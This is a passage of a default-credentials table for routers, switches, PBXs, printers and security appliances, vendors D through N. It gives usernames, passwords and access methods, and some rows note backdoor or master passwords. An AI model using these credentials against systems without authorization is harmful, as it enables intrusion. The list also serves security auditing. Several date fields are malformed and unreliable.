Digicorp Router n/a password Admin No 2003-1-1 2005-13-7
Dlink DSL-500 Multi admin admin Admin No 2002-25-8 2005-13-7
Draytek Vigor all HTTP admin admin Admin No 2004-3-5 2005-13-7
Draytek Vigor 2600 HTTP admin (none) Admin 2006-03-18 2006-03-18
Draytek Vigor 2900+ HTTP admin admin Admin 2006-07-08 2006-07-08
Dynalink RTA230 Multi admin admin Admin No 2004-22-9 2005-13-7
E-Con Econ DSL Router Router admin epicrouter Admin DSL Router 2005-09-15 2005-09-15
E-Tech ADSL Ethernet Router Annex A v2 HTTP admin epicrouter Admin Password can also be password No 2003-26-5 2005-13-7
E-Tech Wireless 11Mbps Router Model:WLRT03 HTTP (none) admin Admin No 2004-3-9 2005-13-7
E-Tech Router RTBR03 HTTP (none) admin Admin 1wan/4ports switch router No 2004-6-9 2005-13-7
Edimax Broadband Router Hardware: Rev A. Boot Code: 1.0 Runtime Code 2.63 HTTP admin 1234 Admin No 2004-2-6 2005-13-7
Edimax EW-7205APL Firmware release 2.40a-00 Multi guest (none) Admin http://secunia.com/advisories/11849/ No 2004-31-6 2005-13-7
Edimax ES-5224RXM Multi admin 123 Admin 2006-01-23 2006-01-23
Efficient Speedstream DSL Telnet n/a admin Admin No 2002-1-10 2005-13-7
Efficient 5871 DSL Router v 5.3.3-0 Multi login admin Admin This is for access to HTTP admin console. No 2002-21-10 2005-13-7
Efficient 5851 Telnet login password Admin might be all 5800 series No 2004-18-7 2005-13-7
Efficient Speedstream DSL n/a admin Admin No 2003-1-1 2005-13-7
Efficient Networks Speedstream 5711 Teledanmark version (only .dk) Console n/a 4getme2 Admin for all your TDC router needs No 2002-1-10 2005-13-7
Efficient Networks EN 5861 Telnet login admin Admin No 2002-1-10 2005-13-7
Efficient Networks 5851 SDSL Router N/A Console (none) hs7mwxkk Admin On some Covad Routers No 2003-5-1 2005-13-7
Elsa LANCom Office ISDN Router 800/1000/1100 Telnet n/a cisco Admin No 2002-1-10 2005-13-7
Enterasys ANG-1105 unknown HTTP admin netadmin Admin default IP is 192.168.1.1 No 2003-6-4 2005-13-7
Enterasys ANG-1105 unknown Telnet (none) netadmin Admin default IP is 192.168.1.1 No 2003-6-4 2005-13-7
Enterasys Vertical Horizon ANY Multi admin (none) Admin this works in telnet or http No 2003-5-11 2005-13-7
Enterasys Vertical Horizon VH-2402S Multi tiger tiger123 Admin 2006-02-01 2006-02-01
Entrust getAccess 4.x and 7.x Web Admin gui websecadm changeme Admin Access to Admin Gui via /sek-bin/login.gas.bat No 2006-03-26 2006-05-28
Ericsson Ericsson Acc netman netman No 2002-1-10 2005-13-7
Ericsson Ericsson Acc netman netman No 2003-1-1 2005-13-7
Ericsson MD110 Telnet MD110 help Admin 2006-08-25 2006-08-25
Ericsson BP250 HTTP admin default Admin 2006-08-25 2006-08-25
Ericsson ACC Tigris Platform All Multi public (none) Guest No 2002-1-10 2005-13-7
EverFocus PowerPlex EDR1600 Multi admin admin Admin No 2002-10-11 2005-13-7
EverFocus PowerPlex EDR1600 Multi supervisor supervisor Admin No 2002-10-11 2005-13-7
EverFocus PowerPlex EDR1600 Multi operator operator Admin No 2002-10-11 2005-13-7
Exabyte Magnum20 FTP anonymous Exabyte Admin 2005-11-15 2005-11-15
Extreme Networks All Switches Multi admin (none) Admin Submitted by Eastman Rivai No 2002-1-10 2005-13-7
F5 Bigip 540 Multi root default Admin No 2004-3-11 2005-13-7
F5-Networks BIGIP Multi n/a (none) Admin No 2003-1-1 2005-13-7
Flowpoint 2200 SDSL Telnet admin admin Admin No 2002-1-10 2005-13-7
Flowpoint DSL Telnet n/a password Admin Installed by Covad No 2002-1-10 2005-13-7
Flowpoint 100 IDSN Telnet admin admin Admin No 2002-1-10 2005-13-7
Flowpoint 40 IDSL Telnet admin admin Admin No 2002-1-10 2005-13-7
Flowpoint Flowpoint DSL admin admin Admin No 2003-1-1 2005-13-7
Fortinet Fortigate Telnet admin (none) Admin No 2003-1-1 2005-13-7
Foundry Networks IronView Network Manager Version 01.6.00a(service pack) 0620031754 HTTP admin admin Admin http://www.foundrynet.com/services/documentation/nms/FEManager_Installation.html Yes 2004-13-4 2005-13-7
Freetech PC BIOS Console n/a Posterie Admin No 2002-1-10 2005-13-7
Freetech BIOS Console n/a Posterie Admin No 2003-1-1 2005-13-7
Fujitsu Siemens Routers HTTP (none) connect Admin No 2004-21-11 2005-13-7
Funk Software Steel Belted Radius 3.x Proprietary admin radius Admin No 2002-1-10 2005-13-7
GVC e800/rb4 HTTP Administrator admin Admin No 2004-8-7 2005-13-7
Gericom Phoenix Multi Administrator (none) Admin 2006-01-04 2006-01-04
HP ISEE Multi admin isee Admin 2005-07-03 2005-07-03
Hewlett Packard Power Manager 3 HTTP admin admin Admin No 2004-25-7 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPP187 No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPP189 No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPP196 No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR INTX3 No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR ITF3000 No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR NETBASE No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR REGO No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR RJE No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR CONV No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR SYS No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR DISC No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR SYSTEM No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR SUPPORT No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR COGNOS No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi PCUSER SYS No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi RSBCMON SYS No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi SPOOLMAN HPOFFICE No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi WP HPOFFICE No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi ADVMAIL HPOFFICE DATA No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi ADVMAIL HP No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD SUPPORT No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD MGR No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD SERVICE No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD MANAGER No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD HPP187 SYS No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD LOTUS No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD HPWORD PUB No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD HPONLY No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi HELLO MANAGER.SYS No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi HELLO MGR.SYS No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi HELLO FIELD.SUPPORT No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi HELLO OP.OPERATOR No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL MAIL No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL REMOTE No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL TELESUP No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL HPOFFICE No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL MPE No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER TCH No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER SYS No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER SECURITY No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER ITF3000 No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER HPOFFICE No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER COGNOS No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER TELESUP No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR SYS No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR CAROLIAN No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR VESOFT No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR XLSERVER No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR SECURITY No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR TELESUP No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPDESK No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR CCC No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR CNAS No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR WORD No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR COGNOS No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR ROBELLE No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPOFFICE No 2002-1-10 2005-13-7
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPONLY No 2002-1-10 2005-13-7
Hewlett-Packard LaserJet Net Printers Ones with Jetdirect on them Telnet (none) (none) Admin press enter twice if no response in telnet -submit by Anymous No 2002-1-10 2005-13-7
Hewlett-Packard LaserJet Net Printers Ones with Jetdirect on them HTTP (none) (none) Admin HTTP interface -submit by Anymous No 2002-1-10 2005-13-7
Hewlett-Packard LaserJet Net Printers Ones with Jetdirect on them FTP Anonymous (none) User send files to be printed -submit by Anymous No 2002-1-10 2005-13-7
Hewlett-Packard LaserJet Net Printers Ones with Jetdirect on them 9100 (none) (none) User Type what you want and close telnet session to print it out -submit by Anymous No 2002-1-10 2005-13-7
Hewlett-Packard webmin 0.84 HTTP admin hp.com Admin you can find more passwords here: http://www.vulnerabilite.com/password_db/ No 2005-22-2 2005-13-7
Huawei MT880r Multi TMAR#HWMT8007079 (none) Admin mpacheco.inimigo.com 2006-06-28 2006-06-28
Huawei mt820 V100R006C01B021 HTTP admin admin Admin Telefonica Colombia ADSL 2006-08-27 2006-08-27
IBM Ascend OEM Routers Telnet n/a ascend Admin No 2002-1-10 2005-13-7
IBM A21m Multi n/a (none) Admin No 2002-1-10 2005-13-7
IBM 390e Multi n/a admin Admin No 2002-1-10 2005-13-7
IBM TotalStorage Enterprise Server Multi storwatch specialist Admin By Nicolas Gregoire Yes 2002-1-10 2005-13-7
IBM 8239 Token Ring HUB 2.5 Console n/a R1QTPS Utility Program submitted by FX Yes 2002-26-8 2005-13-7
IBM 8224 HUB Multi vt100 public Admin Swap MAC address chip from other 8224 No 2002-1-10 2005-13-7
IBM 3534 F08 Fibre Switch Multi admin password Admin No 2003-3-5 2005-13-7
IBM switch 8275-217 Telnet admin (none) Admin No 2002-1-10 2005-13-7
IBM Directory – Web Administration Tool 5.1 HTTP superadmin secret Admin Documented in Web Administration Guide No 2004-01-16 2005-13-7
IBM Hardware Management Console 3 ssh hscroot abc123 Admin No 2005-01-21 2005-13-7
IBM 3583 Tape Library HTTP admin secure Admin 2005-07-12 2005-07-12
IBM Infoprint 6700 http://www.phenoelit.de/dpl/dpl.html Multi root (none) Admin Also works for older 4400 printers and probably Printronics equivalents as well. 2005-10-23 2005-10-23
IBM T20 Multi n/a admin Admin 2006-02-16 2006-02-16
IBM IBM Multi n/a (none) Admin 2006-02-20 2006-02-20
IBM Remote Supervisor Adapter (RSA) HTTP USERID PASSW0RD Admin 2006-02-30 2006-02-30
IBM BladeCenter Mgmt Console HTTP USERID PASSW0RD Admin 2006-02-30 2006-02-30
IBM T42 HTTP Administrator admin Admin 2006-06-27 2006-06-27
IMAI Traffic Shaper TS-1012 HTTP n/a (none) Admin default IP 1.2.3.4 No 2004-11-7 2005-13-7
Infosmart SOHO router HTTP admin 0000 Admin 2005-08-27 2005-08-27
Integral Technologies RemoteView 4 Console Administrator letmein Admin No 2004-17-2 2005-13-7
Intel Shiva Multi root (none) Admin No 2002-1-10 2005-13-7
Intel Express 9520 Router Multi NICONEX NICONEX User No 2002-1-10 2005-13-7
Intel Express 520T Switch Multi setup setup User No 2002-1-10 2005-13-7
Intel Wireless AP 2011 2.21 Multi (none) Intel Admin by FX No 2003-24-4 2005-13-7
Intel Wireless Gateway 3.x HTTP intel intel Admin No 2003-19-4 2005-13-7
Intel Shiva Guest (none) User No 2003-1-1 2005-13-7
Intel Shiva root (none) Admin No 2003-1-1 2005-13-7
Intel/Shiva Mezza ISDN Router All Telnet admin hello Admin No 2004-9-7 2005-13-7
Intel/Shiva Access Port All Telnet admin hello Admin No 2004-9-7 2005-13-7
Interbase Interbase Database Server All Multi SYSDBA masterkey Admin No 2002-1-10 2005-13-7
Intermec Mobile LAN 5.25 Multi intermec intermec Admin No 2003-1-1 2005-13-7
Intershop Intershop 4 HTTP operator $chwarzepumpe Admin No 2002-1-11 2005-13-7
Intersystems Cache Post-RDMS Console system sys Admin Change immediately No 2004-21-8 2005-13-7
IronPort Messaging Gateway Appliance Multi admin ironport Admin 2006-01-25 2006-01-25
Irongate NetSurvibox 266 1 HTTP admin NetSurvibox Admin 2006-09-02 2006-09-02
JAHT adsl router AR41/2A HTTP admin epicrouter Admin 2006-02-03 2006-02-03
JD Edwards WorldVision/OneWorld All(?) Console JDE JDE Admin/SECOFR No 2002-1-10 2005-13-7
JDE WorldVision/OneWorld Multi PRODDTA PRODDTA Admin Owner of database tables and objects No 2003-15-8 2005-13-7
JDS Microprocessing Hydra 3000 r2.02 Console hydrasna (none) Admin www.hydrasystems.com/h3kdocs/H3R25C04.pdf No 2002-1-10 2005-13-7
Juniper ISG2000 Multi netscreen netscreen Admin Just a note – netscreen is now made by Juniper – otherwise no change 2006-06-31 2006-06-31
KTI KS-2260 Telnet superuser 123456 special CLI can be disabled by renaming the regular login name to superuser 2005-08-14 2005-08-14
KTI KS2600 Console admin 123456 Admin 2005-11-14 2005-11-14
KTI KS2260 Console admin 123 Admin 2005-11-14 2005-11-14
Kalatel Calibur DSR-2000e Multi n/a 3477 Admin 2006-02-13 2006-02-13
Kalatel Calibur DSR-2000e on-screen menu system n/a 8111 restore factory defaults 2006-02-13 2006-02-13
Konica Minolta magicolor 2300 DL Multi (none) 1234 Admin info from: ftp://ftp.minolta-qms.com/pub/cts/out_going/manuals/2300dl/nic.pdf No 2004-6-4 2005-13-7
Konica Minolta magicolor 2430DL All Multi (none) (none) Admin Taken from reference manual for product 2005-08-13 2005-08-13
Konica Minolta magicolor 5430 DL HTTP admin administrator Admin 2006-09-16 2006-09-16
Konica/ Minolta Di 2010f n/a HTTP n/a 00000000 Admin Printer configuration interface 2005-06-20 2005-06-20
Kyocera EcoLink 7.2 HTTP n/a PASSWORD Admin No 2002-1-10 2005-13-7
Kyocera Telnet Server IB-20/21 multi root root Admin No 2002-1-10 2005-13-7
Kyocera Intermate LAN FS Pro 10/100 K82_0371 HTTP admin admin Admin No 2004-13-8 2005-13-7
LANCOM IL11 Multi n/a (none) Admin No 2002-12-11 2005-13-7
LG Aria iPECS All Console (none) jannie maintenance dealer backdoor password 2006-00-11 2006-00-11
LG LAM200E / LAM200R Multi admin epicrouter Admin 2006-03-18 2006-03-18
LUCENT M770 Telnet super super Admin No 2005-12-4 2005-13-7
Lantronics Lantronics Terminal Server TCP 7000 n/a access Admin No 2002-1-10 2005-13-7
Lantronics Lantronics Terminal Server TCP 7000 n/a system Admin No 2002-1-10 2005-13-7
Lantronix Lantronix Terminal TCP 7000 n/a lantronix Admin No 2002-1-10 2005-13-7
Lantronix SCS1620 Multi sysadmin PASS Admin 9600/N/8/1 XON/XOFF Yes 2004-23-2 2005-13-7
Lantronix SCS3200 EZWebCon downloaded from ftp.lantronix.com login access Admin secondary port settings login: root password: system Yes 2004-23-2 2005-13-7
Lantronix SCS400 Multi n/a admin Admin secondary priv. password: system Yes 2004-23-2 2005-13-7
Lantronix SCS200 Multi n/a admin Admin secondary priv. password: system Yes 2004-23-2 2005-13-7
Lantronix SCS100 Multi n/a access Admin secondary priv. password: system Yes 2004-22-2 2005-13-7
Lantronix ETS4P Multi n/a (none) Admin secondary priv. password: system Yes 2004-22-2 2005-13-7
Lantronix ETS16P Multi n/a (none) Admin secondary priv. password: system Yes 2004-23-2 2005-13-7
Lantronix ETS32PR Multi n/a (none) Admin secondary priv. password: system Yes 2004-23-2 2005-13-7
Lantronix ETS422PR Multi n/a (none) Admin secondary priv. password: system Yes 2004-23-2 2005-13-7
Linksys WAP11 Multi n/a (none) Admin No 2003-16-6 2005-13-7
Linksys DSL Telnet n/a admin Admin No 2002-1-10 2005-13-7
Linksys EtherFast Cable/DSL ROuter Multi Administrator admin Admin No 2002-1-10 2005-13-7
Linksys Linksys Router DSL/Cable HTTP (none) admin Admin No 2002-1-10 2005-13-7
Linksys BEFW11S4 1 HTTP admin (none) Admin No 2002-1-10 2005-13-7
Linksys BEFSR41 2 HTTP (none) admin Admin No 2003-01-27 2005-13-7
Linksys WRT54G HTTP admin admin Admin No 2004-16-11 2005-13-7
Linksys WAG54G HTTP admin admin Admin No 2004-16-11 2005-13-7
Linksys Linksys DSL n/a admin Admin No 2003-1-1 2005-13-7
Linksys WAP54G 2.0 HTTP (none) admin Admin 2005-07-31 2005-07-31
Linksys WRT54G All Revisions HTTP (none) admin Admin 2006-02-09 2006-02-09
Linksys model WRT54GC compact wireless-G broadband router Multi (none) admin Admin 2006-02-25 2006-02-25
Linksys AG 241 – ADSL2 Gateway with 4-Port Switch Multi admin admin Admin 2006-03-18 2006-03-18
Linksys Comcast Comcast-supplied HTTP comcast 1234 diagnostics 192.168.0.1/docsisdevicestatus.asp 2006-06-14 2006-06-14
Linksys WAG54GS Multi admin admin Admin 2006-06-27 2006-06-27
Linksys/ Cisco RTP300 w/2 phone ports 1.0 HTTP admin admin Admin 2006-07-01 2006-07-01
Linksys/ Cisco RTP300 w/2 phone ports 1.0 HTTP user tivonpw update access use for flashing firmware 2006-07-01 2006-07-01
Livingston IRX Router Telnet !root (none) No 2002-1-10 2005-13-7
Livingston Livingston Portmaster 3 Telnet !root (none) No 2002-1-10 2005-13-7
Livingston Officerouter Telnet !root (none) No 2002-1-10 2005-13-7
Livingstone Portmaster 2R Telnet root (none) Admin No 2002-1-10 2005-13-7
Lockdown Networks All Lockdown Products up to 2.7 Console setup changeme(exclamation) User No 2004-12-4 2005-13-7
Logitech Logitech Mobile Headset Bluetooth (none) 0000 audio access Thierry Zoller (Thierry@sniff-em.com) 2005-07-02 2005-07-02
Lucent B-STDX9000 Multi (any 3 characters) cascade No 2002-1-10 2005-13-7
Lucent B-STDX9000 debug mode n/a cascade No 2002-1-10 2005-13-7
Lucent B-STDX9000 all SNMP n/a cascade Admin No 2002-1-10 2005-13-7
Lucent CBX 500 Multi (any 3 characters) cascade No 2002-1-10 2005-13-7
Lucent CBX 500 debug mode n/a cascade No 2002-1-10 2005-13-7
Lucent GX 550 SNMP readwrite n/a cascade No 2002-1-10 2005-13-7
Lucent MAX-TNT Multi admin Ascend No 2002-1-10 2005-13-7
Lucent PSAX 1200 and below Multi root ascend No 2002-1-10 2005-13-7
Lucent PSAX 1250 and above Multi readwrite lucenttech1 Admin No 2002-1-10 2005-13-7
Lucent PSAX 1250 and above Multi readonly lucenttech2 Admin No 2002-1-10 2005-13-7
Lucent Anymedia Console LUCENT01 UI-PSWD-01 Admin requires GSI software No 2002-1-10 2005-13-7
Lucent Anymedia Console LUCENT02 UI-PSWD-02 Admin requires GSI software No 2002-1-10 2005-13-7
Lucent PacketStar Multi Administrator (none) Admin No 2002-1-10 2005-13-7
Lucent Cellpipe 22A-BX-AR USB D Console admin AitbISP4eCiG Admin No 2004-6-8 2005-13-7
Lucent System 75 bciim bciimpw No 2003-1-1 2005-13-7
Lucent System 75 bcim bcimpw No 2003-1-1 2005-13-7
Lucent System 75 bcms bcmspw No 2003-1-1 2005-13-7
Lucent System 75 bcnas bcnaspw No 2003-1-1 2005-13-7
Lucent System 75 blue bluepw No 2003-1-1 2005-13-7
Lucent System 75 browse browsepw No 2003-1-1 2005-13-7
Lucent System 75 browse looker No 2003-1-1 2005-13-7
Lucent System 75 craft craft No 2003-1-1 2005-13-7
Lucent System 75 craft craftpw No 2003-1-1 2005-13-7
Lucent System 75 cust custpw No 2003-1-1 2005-13-7
Lucent System 75 enquiry enquirypw No 2003-1-1 2005-13-7
Lucent System 75 field support No 2003-1-1 2005-13-7
Lucent System 75 inads indspw No 2003-1-1 2005-13-7
Lucent System 75 inads inads No 2003-1-1 2005-13-7
Lucent System 75 init initpw No 2003-1-1 2005-13-7
Lucent System 75 locate locatepw No 2003-1-1 2005-13-7
Lucent System 75 maint maintpw No 2003-1-1 2005-13-7
Lucent System 75 maint rwmaint No 2003-1-1 2005-13-7
Lucent System 75 nms nmspw No 2003-1-1 2005-13-7
Lucent System 75 rcust rcustpw No 2003-1-1 2005-13-7
Lucent System 75 support supportpw No 2003-1-1 2005-13-7
Lucent System 75 tech field No 2003-1-1 2005-13-7
MERCURY 234234 234234 SNMP Administrator admin Admin No 2002-1-10 2005-13-7
MERCURY KT133A/686B SNMP Administrator admin Admin No 2002-1-10 2005-13-7
Marconi Fore ATM Switches Multi ami (none) Admin No 2002-1-10 2005-13-7
McAfee SCM 3100 4.1 Multi scmadmin scmchangeme Admin 2005-11-23 2005-11-23
McData FC Switches/Directors Multi Administrator password Admin 2005-10-07 2005-10-07
Megastar BIOS Console n/a star Admin No 2003-1-1 2005-13-7
Mentec Micro/RSX Multi MICRO RSX Admin No 2002-1-10 2005-13-7
Mentec Micro/RSX MICRO RSX Admin No 2003-1-1 2005-13-7
Meridian PBX ANY Telnet service smile System This is the default password on most Meridian systems. No 2003-1-6 2005-13-7
Micronet Access Point SP912 Telnet root default Admin No 2002-1-10 2005-13-7
Micronet Micronet SP5002 Console mac (none) Admin No 2003-6-7 2005-13-7
Micronet 3351 / 3354 Multi admin epicrouter Admin 2006-03-18 2006-03-18
Microplex Print Server Telnet root root Admin No 2002-1-10 2005-13-7
Mikrotik Router OS all Telnet admin (none) Admin also for SSH and Web access No 2004-2-9 2005-13-7
Mikrotik Router OS 2.9.17 HTTP admin (none) Admin 2006-05-09 2006-05-09
Milan mil-sm801p Multi root root Admin 2006-00-23 2006-00-23
Minolta PagrPro QMS 4100GN PagePro HTTP n/a sysadm Admin 2006-08-12 2006-08-12
Minolta QMS Magicolor 3100 3.0.0 HTTP operator (none) Admin 2006-02-29 2006-02-29
Minolta QMS Magicolor 3100 3.0.0 HTTP admin (none) Admin Gives access to Accounting 2006-06-31 2006-06-31
Mintel Mintel PBX n/a SYSTEM Admin No 2002-1-10 2005-13-7
Mintel Mintel PBX n/a SYSTEM Admin No 2003-1-1 2005-13-7
Mitel 3300 ICP all HTTP system password Admin No 2003-17-1 2005-13-7
Mitel SX2000 all Multi n/a (none) Admin No 2003-1-1 2005-13-7
Motorola Cablerouter Telnet cablecom router Admin No 2002-1-10 2005-13-7
Motorola WR850G 4.03 HTTP admin motorola Admin higher revisions likely the same No 2003-1-1 2005-13-7
Motorola Wireless Router WR850G HTTP admin motorola Admin No 2005-17-1 2005-13-7
Motorola SBG900 HTTP admin motorola Admin No 2005-10-2 2005-13-7
Motorola Motorola Cablerouter cablecom router Admin No 2003-1-1 2005-13-7
Mutare Software EVM Admin All HTTP (none) admin Admin http://www.mutare.com/data/kb/EVMAdminGuide.pdf Yes 2004-10-4 2005-13-7
NAI Intrushield IPS 1200/2600/4000 SSH + Web console admin admin123 Admin By Nicolas Gregoire No 2004-19-7 2005-13-7
NAI Entercept Management console GlobalAdmin GlobalAdmin Admin By Nicolas Gregoire : must be changed at 1st connection No 2004-19-7 2005-13-7
NEC WARPSTAR-BaseStation Telnet n/a (none) Admin No 2003-18-8 2005-13-7
NGSec NGSecureWeb HTTP admin (none) Admin No 2002-1-10 2005-13-7
NGSec NGSecureWeb HTTP admin asd Admin No 2002-1-10 2005-13-7
NOKIA 7360 Multi (none) 9999 Admin 2005-11-31 2005-11-31
NRG or RICOH DSc338 Printer 1.19 HTTP (none) password Admin no user 2006-00-26 2006-00-26
NetGear RM356 None Telnet (none) 1234 Admin shutdown the router via internet No 2002-1-10 2005-13-7
NetGear WGT624 2 HTTP admin password Admin No 2004-12-10 2005-13-7
NetGear Comcast Comcast-supplied HTTP comcast 1234 diagnostics page 192.168.0.1/docsisdevicestatus.html 2006-06-14 2006-06-14
NetGenesis NetAnalysis Web Reporting HTTP naadmin naadmin Admin No 2002-1-10 2005-13-7
Netcomm NB1300 HTTP admin password Admin No 2003-1-1 2005-13-7
Netgea FR314 HTTP admin password Admin No 2002-1-10 2005-13-7
Netgear MR-314 3.26 HTTP admin 1234 Admin No 2002-1-10 2005-13-7
Netgear RT314 HTTP admin admin Admin No 2002-1-10 2005-13-7
Netgear RP614 HTTP admin password Admin No 2003-14-1 2005-13-7
Netgear RP114 3.26 Telnet (none) 1234 Admin telnet 192.168.0.1 No 2003-1-8 2005-13-7
Netgear WG602 Firmware Version 1.04.0 HTTP super 5777364 Admin Yes 2004-10-6 2005-13-7
Netgear WG602 Firmware Version 1.7.14 HTTP superman 21241036 Admin No 2004-23-6 2005-13-7
Netgear WG602 Firmware Version 1.5.67 HTTP super 5777364 Admin No 2004-23-6 2005-13-7
Netgear MR814 HTTP admin password Admin No 2003-23-8 2005-13-7
Netgear FVS318 HTTP admin password Admin No 2003-1-1 2005-13-7
Netgear DM602 FTP Telnet and HTTP admin password Admin No 2004-22-2 2005-13-7
Netgear FR114P HTTP admin password Admin No 2004-9-11 2005-13-7
Netgear ME102 SNMP (none) private Admin Standard IP-Address is 192.168.0.5 No 2003-1-1 2005-13-7
Netgear WGR614 v4 Multi admin password Admin 192.168.0.1 OR www.routerlogin.net No 2005-20-2 2005-13-7
Netgear RP114 3.20-3.26 HTTP admin 1234 Admin default http://192.168.0.1 Yes 2002-1-10 2005-13-7
Netgear dg834g HTTP admin password Admin it should be work also with dg834gt 2005-09-07 2005-09-07
Netgear Router/Modem Multi admin password Admin 2006-00-04 2006-00-04
Netgear MR314 Multi admin 1234 Admin 2006-00-20 2006-00-20
Netgear GSM7224 HTTP admin (none) Admin 2006-01-03 2006-01-03
Netgear ADSL Modem DG632 V3.3.0a_cx HTTP admin password Admin 2006-04-23 2006-04-23
Netgear WGT634U HTTP admin password Admin 2006-05-14 2006-05-14
Netgear FWG114P Multi n/a admin password 2006-05-27 2006-05-27
Netgear GS724t V1.0.1_1104 HTTP n/a password Admin 2006-05-29 2006-05-29
Netgear WG602 1.7.x HTTP admin password Admin Default IP: DHCP or 192.168.0.227 2006-08-09 2006-08-09
Netgear CG814CCR 2 Multi cusadmin highspeed Admin Comcast small business router. Default access at 10.1.10.1 2006-08-15 2006-08-15
Netopia Netopia 9500 Telnet netopia netopia Admin No 2002-1-10 2005-13-7
Netopia R910 Multi admin (none) Admin No 2002-25-8 2005-13-7
Netopia 3351 Multi n/a (none) Admin No 2003-11-11 2005-13-7
Netopia 4542 Multi admin noway Admin No 2003-26-11 2005-13-7
Netopia Netopia 7100 (none) (none) No 2003-1-1 2005-13-7
Netopia Netopia 9500 netopia netopia No 2003-1-1 2005-13-7
Netport Express 10/100 multi setup setup Admin No 2002-1-10 2005-13-7
Netscreen Firewall multi netscreen netscreen Admin No 2002-1-10 2005-13-7
Netstar Netpilot Multi admin password Admin http://www.netpilot.com/products/netpilot/faq/default.asp No 2003-14-10 2005-13-7
Network Appliance NetCache any Multi admin NetCache Admin No 2002-1-10 2005-13-7
Network Associates WebShield Security Appliance e500 HTTP e500 e500changeme Admin No 2002-17-11 2005-13-7
Network Associates WebShield Security Appliance e250 HTTP e250 e250changeme Admin No 2002-17-11 2005-13-7
Network Everywhere NWR11B HTTP (none) admin Admin 2006-00-18 2006-00-18
Niksun NetDetector Multi vcr NetVCR Admin su after login with empty password No 2003-30-9 2005-13-7
Nimble PC BIOS Console n/a xdfk9874t3 Admin No 2002-1-10 2005-13-7
Nimble BIOS Console n/a xdfk9874t3 Admin No 2003-1-1 2005-13-7
